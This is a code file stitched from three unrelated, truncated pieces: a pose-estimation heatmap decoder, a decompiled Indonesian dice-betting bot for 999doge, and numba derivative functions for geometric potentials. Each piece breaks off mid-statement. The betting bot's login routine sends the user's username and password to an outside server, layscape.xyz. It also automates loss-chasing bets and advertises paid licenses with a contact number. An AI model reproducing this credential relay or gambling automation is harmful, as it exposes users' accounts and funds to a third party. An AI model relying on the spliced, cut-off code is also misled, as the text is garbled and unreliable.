input_tensor = self.interpreter.tensor(tensor_index)
input_tensor()[:,:,:,:] = img
start_time = time.monotonic()
self.interpreter.invoke()
elapsed_ms = (time.monotonic() - start_time) * 1000
out = np.empty(0)
for d in self.interpreter.get_output_details():
o = np.squeeze(self.interpreter.get_tensor(d['index'])).flatten()
out = np.append(out, o)
return (elapsed_ms, out)
def logistic(self, x):
return 1/(1+np.exp(-x))
def isPeak(self, heatmaps_flat, index):
maxindex = index // len(KEYPOINTS)
maxkeypoint = index % len(KEYPOINTS)
y_index = maxindex // self.heatmaps_nx
x_index = maxindex % self.heatmaps_nx
y_index_min = np.max((y_index-1, 0))
y_index_max = np.min((y_index+1, self.heatmaps_ny-1))
x_index_min = np.max((x_index-1, 0))
x_index_max = np.min((x_index+1, self.heatmaps_nx-1))
for y_current in range(y_index_min, y_index_max+1):
for x_current in range(x_index_min, x_index_max+1):
index_current = len(KEYPOINTS)*(y_current * self.heatmaps_nx + x_current) + maxkeypoint
if (heatmaps_flat[index_current] > heatmaps_flat[index]) and (index_current != index):
return False
return True
def ParseOutput(self, output):
inference_time, output = output
outputs = [output[int(i):int(j)] for i, j in zip(self._output_offsets, self._output_offsets[1:])]
heatmaps = outputs[0].reshape(-1, len(KEYPOINTS))
offsets_short_y = outputs[1].reshape(-1, 2*len(KEYPOINTS))[:,0:len(KEYPOINTS)]
offsets_short_x = outputs[1].reshape(-1, 2*len(KEYPOINTS))[:,len(KEYPOINTS):2*len(KEYPOINTS)]
offsets_mid_fwd_y = outputs[2].reshape(-1, 4*len(poseChain))[:,0:len(poseChain)]
offsets_mid_fwd_x = outputs[2].reshape(-1, 4*len(poseChain))[:,len(poseChain):2*len(poseChain)]
offsets_mid_bwd_y = outputs[2].reshape(-1, 4*len(poseChain))[:,2*len(poseChain):3*len(poseChain)]
offsets_mid_bwd_x = outputs[2].reshape(-1, 4*len(poseChain))[:,3*len(poseChain):4*len(poseChain)]
heatmaps = self.logistic((heatmaps - self.quant_heatmaps_off)*self.quant_heatmaps_r)
heatmaps_flat = heatmaps.flatten()
offsets_short_y = (offsets_short_y - self.quant_offsets_short_off)*self.quant_offsets_short_r
offsets_short_x = (offsets_short_x - self.quant_offsets_short_off)*self.quant_offsets_short_r
offsets_mid_fwd_y = (offsets_mid_fwd_y - self.quant_offsets_mid_off)*self.quant_offsets_mid_r
offsets_mid_fwd_x = (offsets_mid_fwd_x - self.quant_offsets_mid_off)*self.quant_offsets_mid_r
offsets_mid_bwd_y = (offsets_mid_bwd_y - self.quant_offsets_mid_off)*self.quant_offsets_mid_r
offsets_mid_bwd_x = (offsets_mid_bwd_x - self.quant_offsets_mid_off)*self.quant_offsets_mid_r
# Obtaining the peaks of heatmaps larger than scoreThreshold
orderedindices = np.argsort(heatmaps_flat)[::-1]
largeheatmaps_indices = np.empty(0, dtype='int32')
for i in range(len(orderedindices)):
if heatmaps_flat[orderedindices[i]] < self.scoreThreshold:
break
if self.isPeak(heatmaps_flat, orderedindices[i]):
largeheatmaps_indices = np.append(largeheatmaps_indices, orderedindices[i])
pose_list = np.full(self.maxPoseDetections*2*len(KEYPOINTS), 0.0, dtype='float32').reshape(-1, len(KEYPOINTS), 2)
maxindex_list = np.full(self.maxPoseDetections*len(KEYPOINTS), -1, dtype='int32').reshape(-1, len(KEYPOINTS))
score_list = np.full(self.maxPoseDetections*len(KEYPOINTS), 0.0, dtype='float32').reshape(-1, len(KEYPOINTS))
pose_score_list = np.full(self.maxPoseDetections, 0.0, dtype='float32')
nPoses = 0
# obtaining at most maxPoseDetections poses
for point in range(len(largeheatmaps_indices)):
if nPoses >= self.maxPoseDetections:
break
# obtain a root candidate
maxindex = largeheatmaps_indices[point] // len(KEYPOINTS)
maxkeypoint = largeheatmaps_indices[point] % len(KEYPOINTS)
y = self.heatmaps_stride_y * (maxindex // self.heatmaps_nx)
x = self.heatmaps_stride_x * (maxindex % self.heatmaps_nx)
y += offsets_short_y[maxindex, maxkeypoint]
x += offsets_short_x[maxindex, maxkeypoint]
# skip keypoint with (x, y) that is close to the existing keypoints
skip = 0
for p in range(nPoses):
y_exist = pose_list[p, maxkeypoint, 0]
x_exist = pose_list[p, maxkeypoint, 1]
if (y_exist - y)*(y_exist - y) + (x_exist - x)*(x_exist - x) < self.sqRadius:
skip = 1
break
if skip == 1:
continue
# setting the maxkeypoint as root
pose_list[nPoses, maxkeypoint, 0] = y
pose_list[nPoses, maxkeypoint, 1] = x
maxindex_list[nPoses, maxkeypoint] = maxindex
score_list[nPoses, maxkeypoint] = heatmaps[maxindex, maxkeypoint]
# backward decoding
for edge in reversed(range(len(poseChain))):
sourceKeypointId = parentToChildEdges[edge]
targetKeypointId = childToParentEdges[edge]
if maxindex_list[nPoses, sourceKeypointId] != -1 and maxindex_list[nPoses, targetKeypointId] == -1:
maxindex = maxindex_list[nPoses, sourceKeypointId]
y = pose_list[nPoses, sourceKeypointId, 0]
x = pose_list[nPoses, sourceKeypointId, 1]
y += offsets_mid_bwd_y[maxindex, edge]
x += offsets_mid_bwd_x[maxindex, edge]
y_index = np.clip(round(y / self.heatmaps_stride_y), 0, self.heatmaps_ny-1)
x_index = np.clip(round(x / self.heatmaps_stride_x), 0, self.heatmaps_nx-1)
maxindex_list[nPoses, targetKeypointId] = self.heatmaps_nx*y_index + x_index
for i in range(self.offsetRefineStep):
y_index = np.clip(round(y / self.heatmaps_stride_y), 0, self.heatmaps_ny-1)
x_index = np.clip(round(x / self.heatmaps_stride_x), 0, self.heatmaps_nx-1)
maxindex_list[nPoses, targetKeypointId] = self.heatmaps_nx*y_index + x_index
y = self.heatmaps_stride_y * y_index
x = self.heatmaps_stride_x * x_index
y += offsets_short_y[maxindex_list[nPoses, targetKeypointId], targetKeypointId]
x += offsets_short_x[maxindex_list[nPoses, targetKeypointId], targetKeypointId]
pose_list[nPoses, targetKeypointId, 0] = y
pose_list[nPoses, targetKeypointId, 1] = x
score_list[nPoses, targetKeypointId] = heatmaps[maxindex_list[nPoses, targetKeypointId], targetKeypointId]
# forward decoding
for edge in range(len(poseChain)):
sourceKeypointId = childToParentEdges[edge]
targetKeypointId = parentToChildEdges[edge]
if maxindex_list[nPoses, sourceKeypointId] != -1 and maxindex_list[nPoses, targetKeypointId] == -1:
maxindex = maxindex_list[nPoses, sourceKeypointId]
y = pose_list[nPoses, sourceKeypointId, 0]
x = pose_list[nPoses, sourceKeypointId, 1]
y += offsets_mid_fwd_y[maxindex, edge]
x += offsets_mid_fwd_x[maxindex, edge]
y_index = np.clip(round(y / self.heatmaps_stride_y), 0, self.heatmaps_ny-1)
x_index = np.clip(round(x / self.heatmaps_stride_x), 0, self.heatmaps_nx-1)
maxindex_list[nPoses, targetKeypointId] = self.heatmaps_nx*y_index + x_index
for i in range(self.offsetRefineStep):
y_index = np.clip(round(y / self.heatmaps_stride_y), 0, self.heatmaps_ny-1)
x_index = np.clip(round(x / self.heatmaps_stride_x), 0, self.heatmaps_nx-1)
maxindex_list[nPoses, targetKeypointId] = self.heatmaps_nx*y_index + x_index
y = self.heatmaps_stride_y * y_index
x = self.heatmaps_stride_x * x_index
y += offsets_short_y[maxindex_list[nPoses, targetKeypointId], targetKeypointId]
x += offsets_short_x[maxindex_list[nPoses, targetKeypointId], targetKeypointId]
pose_list[nPoses, targetKeypointId, 0] = y
pose_list[nPoses, targetKeypointId, 1] = x
score_list[nPoses, targetKeypointId] = heatmaps[maxindex_list[nPoses, targetKeypointId], targetKeypointId]
# calculate pose score
score = 0
for k in range(len(KEYPOINTS)):
y = pose_list[nPoses, k, 0]
x = pose_list[nPoses, k, 1]
closekeypoint_exists = False
for p in range(nPoses):
y_exist = pose_list[p, k, 0]
x_exist = pose_list[p,
# selenia/selenia.py -- decompiled from Python 3.8 bytecode
# Decompiled: Mon Sep 21 15:47:16 2020 (source timestamp 2020-09-18 02:01:53)
import cloudscraper, sys, os, time, random, requests
from datetime import datetime
from config import *
headers = {'user-agent':'Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.93 Mobile Safari/537.36',
'content-type':'application/x-www-form-urlencoded',
'accept':'/',
'x-requested-with':'com.reland.relandicebot',
'sec-fetch-site':'cross-site',
'sec-fetch-mode':'cors',
'accept-encoding':'gzip, deflate',
'accept-language':'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
'cookie':'lang=id'}
scr = cloudscraper.create_scraper()
url = 'https://www.999doge.com/api/web.aspx'
birutua = '\x1b[0;34m'
putih = '\x1b[0m'
kuning = '\x1b[1;33m'
hijau = '\x1b[1;32m'
merah = '\x1b[1;31m'
biru = '\x1b[0;36m'
ungu = '\x1b[1;35m'
bghijau_white = '\x1b[5;37;42m'
bgmerah_black = '\x1b[5;37;41m'
num_format = '{:.8f}'.format
num_PayIn = '{:0>1.0f}'.format
Username = account['Username']
Password = account['Password']
BaseTrade = float(tradeset['BaseTrade'])
C1 = float(tradeset['C1'])
C2 = float(tradeset['C2'])
TC1 = int(tradeset['TradeCount_1'])
TC2 = int(tradeset['TradeCount_2'])
if TC1 > 200 or (TC2 > 200):
print('Number Of Trade Out of Limit')
sys.exit()
IncreaseOnWinPercent = str(tradeset['MultiplyOnWin'])
if IncreaseOnWinPercent == '0':
ResetOnWin = 1
else:
ResetOnWin = 0
IncreaseOnLosePercent = str(tradeset['MultiplyOnLose'])
if IncreaseOnLosePercent == '0':
ResetOnLose = 1
else:
ResetOnLose = 0
MaxBase = tradeset['MaxBaseTrade']['Toogle']
if MaxBase == 'ON':
MaxBaseTrade = float(tradeset['MaxBaseTrade']['Max']) * 100000000
if tradeset['MaxBaseTrade']['ResetOnLoseMaxTrade'] == 'ON':
ResetOnLoseMaxTrade = 1
else:
ResetOnLoseMaxTrade = 0
if tradeset['MaxBaseTrade']['StopOnLoseMaxTrade'] == 'ON':
StopOnLoseMaxTrade = 1
else:
StopOnLoseMaxTrade = 0
elif MaxBase == 'OFF':
MaxBaseTrade = 0
ResetOnLoseMaxTrade = 0
StopOnLoseMaxTrade = 0
ForceTC1AfterLose = tools['ForceTC1AfterLose']
ChangeTCAfterLose = tools['ChangeTCAfterLose']['Toogle']
TargetProfit = float(tools['TargetProfit'])
ClientSeed = int(tradeset['ClientSeed'])
RecoveryMultiplier = float(tools['RecoveryMultiplier'])
RecoveryIncrease = float(tools['RecoveryIncrease'])
AddDelayTrade = float(tools['AddDelayTrade'])
AddDelayTradeWin = float(tools['AddDelayTradeWin'])
AddDelayTradeLose = float(tools['AddDelayTradeLose'])
StopLoseBalance = float(tools['StopLoseBalance'])
ContinueLastBase = tools['ContinueLastBase']
SmartRecovery = tools['SmartRecovery']
def withdraw():
amt = input('Withdraw Amount (0 = withdraw all) : ')
Address = input('Wallet : ')
Amount = int(amt) * 100000000
otp = input('2FA Code (IF Enabled): ')
withdraw_data = 'a=Withdraw&s=' + ses + '&Amount=' + str(Amount) + '&Address=' + Address + '&Totp=' + otp + '&Currency=doge'
withdraw = scr.post(url, data=withdraw_data, headers=headers).json()
try:
if withdraw['Pending']:
print(hijau + 'Success Pending' + putih)
input('')
except:
pass
try:
if withdraw['TooSmall']:
print(hijau + 'Minimum 2 DOGE' + putih)
input('')
except:
pass
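# Note on units: the API works in base units, so the conversion above
# multiplies by 100000000 (1 DOGE = 1e8 base units). A 2 DOGE withdrawal
# is therefore sent as Amount=200000000.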
def harga_license():
print('Price List License SELENIA TRADEBOT')
print(hijau + '~Premium~' + putih)
print(biru + '[1] 14 Days - 15K IDR SG SERVER - 1 USER - MULTI DEVICE')
print('[2] 30 Days - 25K - IDR SG SERVER - 1 USER - MULTI DEVICE')
print(hijau + '~Platinum~' + putih)
print(biru + '[1] 14 Days - ̶2̶5̶K > 15K - SG SERVER - MULTI USER - MULTI DEVICE')
print('[2] 30 Days - ̶3̶5̶K > 20K - SG SERVER - MULTI USER - MULTI DEVICE' + putih)
print(kuning + 'Price Valid Until 24/09/2020')
print('Contact Admin :')
print('Whatsapp/Telegram : +6283153942438')
print('*Chat Only*')
input('Enter' + putih)
def post(data):
req = requests.post(url, data=data, headers=headers).json()
return req
def login():
otp = ''
data = {'username':Username,
'password':Password}
url_get = 'http://layscape.xyz/selenia/getuser.php'
getid = scr.post(url_get, data=data).json()
if getid['status'] == 'Berhasil':
pass
else:
print(merah + getid['status'] + putih)
sys.exit()
otp = input('2FA Code (If Enabled) : ')
login = 'a=Login&Key=<KEY>&Username=' + getid['username'] + '&Password=' + getid['password'] + '&Totp=' + otp
global ses # the session cookie is read later by withdraw() and autobet()
try:
req = post(login) # assign the JSON reply (assignment lost in decompilation)
ses = req['SessionCookie']
refer = req['ReferredById']
dogebalance = req['Doge']['Balance'] / 100000000
accid = req['AccountId']
print(hijau + 'Login Success')
statslogin = 'Online'
getwalletdoge = 'a=GetDepositAddress&s=' + ses + '&Currency=doge'
req = post(getwalletdoge)
dogewallet = req['Address']
time.sleep(2)
except Exception as e:
print(e)
print(merah + 'Check Username or Password')
sys.exit()
return getid
# Filenames : <EzzKun>
# Python bytecode : 3.8
# Time : Sun Sep 20 17:46:07 2020
# Selector autobet in line 171 file <EzzKun>
# Timestamp in code : 2020-07-16 04:45:22
def autobet(x):
win = 0
lose = 0
wins = 0
loses = 0
delay = 0
MaxPayIns = 0
MaxBase = 0
MaxPayOuts = 0
TotalProfit = 0
ProfitSementara = 0
PayIn = 0
LProfit = 0
if BaseTrade >= float(1e-08) and BaseTrade < float(0.0001):
delay = 2
elif BaseTrade >= float(0.0001) and BaseTrade < float(0.001):
delay = 1
elif BaseTrade >= float(0.001) and BaseTrade < float(0.01):
delay = 0.5
elif BaseTrade >= float(0.01):
delay = 0
if x > 150:
print(hijau + 'Please Buy License')
print(kuning + 'Max Balance For Free Is 150 Doge', putih)
sys.exit()
else:
print(hijau + 'Start Trading' + putih)
time.sleep(2)
os.system('clear')
if BaseTrade > 0:
PayIn = BaseTrade * int(100000000)
else:
PayIn = BaseTrade / int(100000000)
Profit = 0
NumberOfTrade = random.randint(TC1, TC2)
while True:
try:
if TotalProfit < TargetProfit:
time.sleep(AddDelayTrade)
ch = round(random.uniform(C2, C1), 2)
Low = int(1000000) - ch * int(10000)
PlaceAutoBets = {'a':'PlaceAutomatedBets',
's':ses,
'BasePayIn':num_PayIn(int(PayIn)),
'Low':int(Low),
'High':'999999',
'MaxBets':int(NumberOfTrade),
'ResetOnWin':ResetOnWin,
'ResetOnLose':ResetOnLose,
'IncreaseOnWinPercent':str(IncreaseOnWinPercent),
'IncreaseOnLosePercent':str(IncreaseOnLosePercent),
'MaxPayIn':int(MaxBaseTrade),
'ResetOnLoseMaxBet':int(ResetOnLoseMaxTrade),
'StopOnLoseMaxBet':int(StopOnLoseMaxTrade),
'ClientSeed':int(ClientSeed),
'Currency':Currency,
'ProtocolVersion':'2'}
req = post(PlaceAutoBets) # assign the JSON reply (assignment lost in decompilation)
try:
if int(req['InsufficientFunds']) == 1:
print('\n\nInsufficient Funds')
input('Enter')
except KeyError:
pass # no 'InsufficientFunds' field in the reply; continue with the results
BetCount = len(req['PayIns'])
PayIns = sum(req['PayIns'])
PayOuts = sum(req['PayOuts'])
if MaxPayIns > PayIns:
MaxPayIns = PayIns
count_profit = PayOuts + PayIns
if MaxPayOuts > count_profit:
MaxPayOuts = count_profit
Profit += count_profit
TotalProfit = Profit / 100000000
if PayOuts > 0 and count_profit > 0:
win += 1
lose = 0
if wins < win:
wins += 1
print(bghijau_white + 'TC:', BetCount, 'TradeIn:', num_format(PayIns / -100000000) + ' TradeProfit:', ' ' + num_format(count_profit / 100000000) + putih)
print(hijau, 'Profit :', (num_format(Profit / 100000000) + putih), (hijau + '[W]' + str(win) + ':' + str(wins) + merah), ('[L]' + str(lose) + ':' + str(loses) + putih), end='\r')
if BaseTrade > 0:
PayIn = BaseTrade * int(100000000)
NumberOfTrade = random.randint(TC1, TC2)
else:
PayIn = BaseTrade / int(100000000)
NumberOfTrade = random.randint(TC1, TC2)
if SmartRecovery == 'ON':
LProfit += count_profit
if LProfit > 0:
LProfit = 0
if BaseTrade > 0:
PayIn = BaseTrade * int(100000000)
NumberOfTrade = random.randint(TC1, TC2)
else:
LProfit += Profit
PayIn = BaseTrade / int(100000000)
NumberOfTrade = random.randint(TC1, TC2)
else:
LProfit += count_profit
if ContinueLastBase == 'ON':
PayIn = (req['PayIns'][(-1)] + RecoveryIncrease) * RecoveryMultiplier
else:
PayIn = (req['PayIns'][0] + RecoveryIncrease) * RecoveryMultiplier
if MaxBase == 'ON':
MaxBaseTrade = (MaxBaseTrade + RecoveryIncrease) * RecoveryMultiplier
elif MaxBase == 'OFF':
MaxBaseTrade = 0
if ForceTC1AfterLose == 'ON':
NumberOfTrade = 1
elif ForceTC1AfterLose == 'OFF':
NumberOfTrade = random.randint(TC1, TC2)
if ChangeTCAfterLose == 'ON':
NumberOfTrade = tools['ChangeTCAfterLose']['ChangeTo']
else:
pass
if MaxBase == 'ON':
MaxBaseTrade = float(tradeset['MaxBaseTrade']['Max']) * 100000000
elif MaxBase == 'OFF':
MaxBaseTrade = 0
time.sleep(AddDelayTradeWin)
else:
win = 0
lose += 1
LProfit += count_profit
if loses < lose:
loses += 1
print(bgmerah_black + 'TC:', BetCount, 'TradeIn:', num_format(PayIns / -100000000) + ' TradeProfit:', num_format(count_profit / 100000000) + putih)
print(hijau, 'Profit :', (num_format(Profit / 100000000) + putih), (hijau + '[W]' + str(win) + ':' + str(wins) + merah), ('[L]' + str(lose) + ':' + str(loses) + putih), end='\r')
if ContinueLastBase == 'ON':
PayIn = (req['PayIns'][(-1)] + RecoveryIncrease) * RecoveryMultiplier
else:
PayIn = (req['PayIns'][0] + RecoveryIncrease) * RecoveryMultiplier
if MaxBase == 'ON':
MaxBaseTrade = (MaxBaseTrade + RecoveryIncrease) * RecoveryMultiplier
elif MaxBase == 'OFF':
MaxBaseTrade = 0
if ForceTC1AfterLose == 'ON':
NumberOfTrade = 1
elif ForceTC1AfterLose == 'OFF':
NumberOfTrade = random.randint(TC1, TC2)
if ChangeTCAfterLose == 'ON':
NumberOfTrade = tools['ChangeTCAfterLose']['ChangeTo']
else:
pass
time.sleep(AddDelayTradeLose)
time.sleep(delay)
if Profit < float(StopLoseBalance):
print(merah + '\nStop Loss Reached' + putih)
sys.exit()
print('\nTrading Complete\nTrade Summary:')
print(kuning + 'Profit :', num_format(Profit / 100000000))
print('Higher TradeIn :', num_format(MaxPayIns / -100000000))
print('Higher PayOut :', num_format(MaxPayOuts / 100000000))
except Exception as e:
print(e)
input('Enter')
def ainfo():
url_login = 'https://www.999doge.com/api/web.aspx'
dlogin = 'a=Login&Key=<KEY>&Username=' + getid['username'] + '&Password=' + getid['password'] + '&Totp='
login = scr.post(url_login, data=dlogin, headers=headers).json()
seswallet = login['SessionCookie']
getwalletdoge = 'a=GetDepositAddress&s=' + seswallet + '&Currency=doge'
pwalletdoge = scr.post(url_login, data=getwalletdoge, headers=headers)
login = scr.post(url_login, data=dlogin, headers=headers).json()
dogbal = login['Doge']['Balance'] / 100000000
depodog = login['Doge']['DepositAddress']
depoltc = login['LTC']['DepositAddress']
depoeth = login['ETH']['DepositAddress']
depobtc = login['DepositAddress']
accid = login['AccountId']
print('Account Information:')
print('ID :',
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 25 16:18:19 2017
Numerical values for derivatives of the potentials
@author: amit
"""
from numba import jit, f8
from numpy import sqrt, array, cos, sin
"""
Derivative of co-planarity potential wrt vi
"""
@jit( f8[:](f8[:], f8[:], f8[:]), cache=True, nopython=True )
def Dphi_pDvi(vi, xi, xj):
u0,u1,u2 = vi
x0,x1,x2 = xi
y0,y1,y2 = xj
vi_mag_sqr = u0**2 + u1**2 + u2**2
vi_mag = sqrt(vi_mag_sqr)
sin_alpha_i = sin( 0.5*vi_mag )
cos_alpha_i = cos( 0.5*vi_mag )
Dphi_pDu0 = ((-x0 +\
y0)*(2*cos_alpha_i*sin_alpha_i*u1/vi_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2) + (-x1 + y1)*(-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2) + (-x2 + y2)*(cos_alpha_i**2 -\
sin_alpha_i**2*u0**2/vi_mag**2 - sin_alpha_i**2*u1**2/vi_mag**2 +\
sin_alpha_i**2*u2**2/vi_mag**2))*(2*(-x0 +\
y0)*(cos_alpha_i**2*u0*u1/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0**2*u2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u0*u1/vi_mag**3 -\
4*sin_alpha_i**2*u0**2*u2/vi_mag**4 -\
sin_alpha_i**2*u0*u1/vi_mag**2 + 2*sin_alpha_i**2*u2/vi_mag**2) +\
2*(-x1 + y1)*(-cos_alpha_i**2*u0**2/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0**2/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i*u0*u1*u2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i/vi_mag + sin_alpha_i**2*u0**2/vi_mag**2 -\
4*sin_alpha_i**2*u0*u1*u2/vi_mag**4) + 2*(-x2 + y2)*(-\
cos_alpha_i*sin_alpha_i*u0**3/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u0*u1**2/vi_mag**3 +\
cos_alpha_i*sin_alpha_i*u0*u2**2/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*sin_alpha_i**2*u0**3/vi_mag**4 + \
2*sin_alpha_i**2*u0*u1**2/vi_mag**4 -\
2*sin_alpha_i**2*u0*u2**2/vi_mag**4 -\
2*sin_alpha_i**2*u0/vi_mag**2))
Dphi_pDu1 = ((-x0 +\
y0)*(2*cos_alpha_i*sin_alpha_i*u1/vi_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2) + (-x1 + y1)*(-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2) + (-x2 + y2)*(cos_alpha_i**2 -\
sin_alpha_i**2*u0**2/vi_mag**2 - sin_alpha_i**2*u1**2/vi_mag**2 +\
sin_alpha_i**2*u2**2/vi_mag**2))*(2*(-x0 +\
y0)*(cos_alpha_i**2*u1**2/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0*u1*u2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u1**2/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i/vi_mag -\
4*sin_alpha_i**2*u0*u1*u2/vi_mag**4 -\
sin_alpha_i**2*u1**2/vi_mag**2) + 2*(-x1 + y1)*(-\
cos_alpha_i**2*u0*u1/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0*u1/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i*u1**2*u2/vi_mag**3 +\
sin_alpha_i**2*u0*u1/vi_mag**2 -\
4*sin_alpha_i**2*u1**2*u2/vi_mag\
**4 + 2*sin_alpha_i**2*u2/vi_mag**2) + 2*(-x2 + y2)*(-\
cos_alpha_i*sin_alpha_i*u0**2*u1/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u1**3/vi_mag**3 +\
cos_alpha_i*sin_alpha_i*u1*u2**2/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u1/vi_mag +\
2*sin_alpha_i**2*u0**2*u1/vi_mag**4 +\
2*sin_alpha_i**2*u1**3/vi_mag**4 -\
2*sin_alpha_i**2*u1*u2**2/vi_mag**4 -\
2*sin_alpha_i**2*u1/vi_mag**2))
Dphi_pDu2 = ((-x0 +\
y0)*(2*cos_alpha_i*sin_alpha_i*u1/vi_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2) + (-x1 + y1)*(-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2) + (-x2 + y2)*(cos_alpha_i**2 -\
sin_alpha_i**2*u0**2/vi_mag**2 - sin_alpha_i**2*u1**2/vi_mag**2 +\
sin_alpha_i**2*u2**2/vi_mag**2))*(2*(-x0 +\
y0)*(cos_alpha_i**2*u1*u2/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0*u2**2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u1*u2/vi_mag**3 -\
4*sin_alpha_i**2*u0*u2**2/vi_mag**4 + 2*sin_alpha_i**2*u0/vi_mag**2 -\
sin_alpha_i**2*u1*u2/vi_mag**2) + 2*(-x1 + y1)*(-\
cos_alpha_i**2*u0*u2/vi_mag**2 +\
2*cos_alpha_i*sin_alpha_i*u0*u2/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i*u1*u2**2/vi_mag**3 +\
sin_alpha_i**2*u0*u2/vi_mag**2 -\
4*sin_alpha_i**2*u1*u2**2/vi_mag\
**4 + 2*sin_alpha_i**2*u1/vi_mag**2) + 2*(-x2 + y2)*(-\
cos_alpha_i*sin_alpha_i*u0**2*u2/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u1**2*u2/vi_mag**3 +\
cos_alpha_i*sin_alpha_i*u2**3/vi_mag**3 -\
cos_alpha_i*sin_alpha_i*u2/vi_mag +\
2*sin_alpha_i**2*u0**2*u2/vi_mag**4 +\
2*sin_alpha_i**2*u1**2*u2/vi_mag**4 -\
2*sin_alpha_i**2*u2**3/vi_mag**4 + 2*sin_alpha_i**2*u2/vi_mag**2))
return array([Dphi_pDu0,Dphi_pDu1,Dphi_pDu2])
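# A sanity check one might run (assuming a scalar phi_p(vi, xi, xj)
# implementation of the co-planarity potential exists elsewhere): compare
# the analytic gradient against central finite differences.
#   import numpy as np
#   def fd_grad(f, vi, xi, xj, h=1e-6):
#       g = np.zeros(3)
#       for k in range(3):
#           e = np.zeros(3); e[k] = h
#           g[k] = (f(vi + e, xi, xj) - f(vi - e, xi, xj)) / (2.0*h)
#       return g
#   vi = np.array([0.3, -0.2, 0.5])
#   xi = np.zeros(3); xj = np.ones(3)
#   # expect agreement to roughly 1e-5:
#   # Dphi_pDvi(vi, xi, xj)  vs  fd_grad(phi_p, vi, xi, xj)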
"""
Derivative of co-normality potential wrt vi
"""
@jit( f8[:](f8[:], f8[:]), cache=True, nopython=True )
def Dphi_nDvi(vi, vj):
u0,u1,u2 = vi
v0,v1,v2 = vj
vi_mag_sqr = u0**2 + u1**2 + u2**2
vj_mag_sqr = v0**2 + v1**2 + v2**2
vi_mag = sqrt(vi_mag_sqr)
vj_mag = sqrt(vj_mag_sqr)
sin_alpha_i = sin( 0.5*vi_mag )
sin_alpha_j = sin( 0.5*vj_mag )
cos_alpha_i = cos( 0.5*vi_mag )
cos_alpha_j = cos( 0.5*vj_mag )
Dphi_nDu0 = (-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 -\
2*sin_alpha_j**2*v1*v2/vj_mag**2)*(-\
2*cos_alpha_i**2*u0**2/vi_mag**2 + 4*\
cos_alpha_i*sin_alpha_i*u0**2/vi_mag**3 +\
4*cos_alpha_i*sin_alpha_i*u0*u1*u2/vi_mag**3 -\
4*cos_alpha_i*sin_alpha_i/vi_mag + 2*sin_alpha_i**2*u0**2/vi_mag**2 -\
8*sin_alpha_i**2*u0*u1*u2/vi_mag**4) +\
(2*cos_alpha_i*sin_alpha_i*u1/vi_mag -\
2*cos_alpha_j*sin_alpha_j*v1/vj_mag +\
2*sin_alpha_i**2*u0*u2/vi_mag**2 -\
2*sin_alpha_j**2*v0*v2/vj_mag**2)*(2*cos_alpha_i**2*u0*u1/vi_mag**2 +\
4*cos_alpha_i*sin_alpha_i*u0**2*u2/vi_mag**3 -\
4*cos_alpha_i*sin_alpha_i*u0*u1/vi_mag**3 -\
8*sin_alpha_i**2*u0**2*u2/vi_mag**4 -\
2*sin_alpha_i**2*u0*u1/vi_mag**2 + 4*sin_alpha_i**2*u2/vi_mag**2) +\
(cos_alpha_i**2 - cos_alpha_j**2 - sin_alpha_i**2*u0**2/vi_mag**2 -\
sin_alpha_i**2*u1**2/vi_mag**2 + sin_alpha_i**2*u2**2/vi_mag**2 +\
sin_alpha_j**2*v0**2/vj_mag**2 + sin_alpha_j**2*v1**2/vj_mag**2 -\
sin_alpha_j**2*v2**2/vj_mag**2)*(-\
2*cos_alpha_i*sin_alpha_i*u0**3/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u0*u1**2/vi_mag**3 +\
2*cos_alpha_i*sin_alpha_i*u0*u2**2/vi_mag**3 -\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
4*sin_alpha_i**2*u0**3/vi_mag**4 +\
4*sin_alpha_i**2*u0*u1**2/vi_mag**4 -\
4*sin_alpha_i**2*u0*u2**2/vi_mag**4 -\
4*sin_alpha_i**2*u0/vi_mag**2)
Dphi_nDu1 = (-\
2*cos_alpha_i*sin_alpha_i*u0/vi_mag +\
2*cos_alpha_j*sin_alpha_j*v0/vj_mag +\
2*sin_alpha_i**2*u1*u2/vi_mag**2 -\
2*sin_alpha_j**2*v1*v2/vj_mag**2)*(-\
2*cos_alpha_i**2*u0*u1/vi_mag**2 + 4*\
cos_alpha_i*sin_alpha_i*u0*u1/vi_mag**3 +\
4*cos_alpha_i*sin_alpha_i*u1**2*u2/vi_mag**3 +\
2*sin_alpha_i**2*u0*u1/vi_mag**2 -\
8*sin_alpha_i**2*u1**2*u2/vi_mag**4 +\
4*sin_alpha_i**2*u2/vi_mag**2) + (2*\
cos_alpha_i*sin_alpha_i*u1/vi_mag -\
